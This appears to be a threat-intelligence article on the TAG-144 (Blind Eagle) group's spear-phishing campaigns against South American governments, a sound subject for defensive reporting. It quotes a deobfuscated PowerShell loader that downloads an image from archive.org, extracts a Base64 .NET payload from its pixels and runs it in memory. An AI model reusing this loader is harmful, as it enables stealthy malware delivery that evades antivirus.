Over the past year, a clandestine cyber threat group identified as TAG-144—also known by aliases Blind Eagle and APT-C-36—has escalated its operations targeting government institutions across South America. First detected in 2018, this group has refined its methods, employing a variety of remote access trojans (RATs) such as AsyncRAT, REMCOS RAT, and XWorm. These malicious tools are predominantly disseminated through meticulously crafted spear-phishing campaigns that impersonate official judicial or tax communications.
In mid-2025, cybersecurity analysts from Recorded Future observed a significant surge in TAG-144’s activities. The group orchestrated five distinct operational clusters, each deploying new infrastructure and exploiting legitimate internet services to deliver malware payloads. Their initial access strategy often involves the use of compromised or spoofed email accounts from local government agencies. Unsuspecting recipients are enticed to open malicious documents or SVG attachments, which contain embedded JavaScript. When executed, this script retrieves a secondary loader from platforms like Paste.ee or Discord’s Content Delivery Network (CDN).
Recorded Future’s research uncovered numerous compromised email addresses belonging to Colombian government officials. These accounts were utilized to dispatch deceptive legal summonses, showcasing TAG-144’s adeptness at merging social engineering tactics with technical subterfuge. The repercussions of these campaigns have been particularly severe for Colombia’s federal and municipal agencies. The unauthorized extraction of credentials and sensitive data poses significant risks, including espionage and potential financial extortion.
While TAG-144’s operational clusters share core tactics—such as the use of dynamic DNS domains, open-source RATs, and stolen crypters—the group’s evolving techniques, including steganography and domain generation algorithms (DGAs), signify a shift towards more resilient and elusive operations. This evolution not only complicates traditional defense mechanisms but also blurs the lines between conventional cybercrime and state-sponsored espionage.
Infection Mechanism and Steganographic Payload Extraction
One of TAG-144’s more sophisticated methods involves embedding a Base64-encoded .NET assembly within the pixel data of an innocuous JPEG image hosted on Archive.org. Upon execution of the initial PowerShell script, the loader scans for a predefined byte marker within the image. It then extracts and invokes the payload directly in memory, effectively bypassing disk writes and evading detection by antivirus software.
For instance, the deobfuscated PowerShell segment responsible for this process operates as follows:
“`powershell
$tormodont = ‘https://archive.org/download/universe-…/universe.jpg’
$sclere = New-Object System.Net.WebClient
$sclere.Headers.Add(‘User-Agent’,’Mozilla/5.0′)
$sorority = $sclere.DownloadData($tormodont)
# Identify marker and extract embedded bytes
$splenoncus = $sorority[$markerIndex..($sorority.Length – 1)]
$stream = New-Object IO.MemoryStream
$stream.Write($splenoncus, 0, $splenoncus.Length)
$bitmap = [Drawing.Bitmap]::FromStream($stream)
# Reconstruct payload from pixel data
foreach ($y in 0..($bitmap.Height-1)) {
foreach ($x in 0..($bitmap.Width-1)) {
$color = $bitmap.GetPixel($x,$y)
$bytesList.Add($color.R); $bytesList.Add($color.G); $bytesList.Add($color.B)
}
}
$payloadBytes = [Convert]::FromBase64String($bytesList[4..($length+3)] -join ”)
[Reflection.Assembly]::Load($payloadBytes).EntryPoint.Invoke($null,$args)
“`
This in-memory injection technique, combined with dynamic domain resolution—often utilizing services like duckdns.org and noip.com—ensures that the RAT’s command-and-control infrastructure remains agile and challenging to trace. By avoiding traditional executable downloads and employing steganography, TAG-144 demonstrates an advanced understanding of detection evasion and asset staging. This poses a persistent and evolving threat to government networks throughout the region.
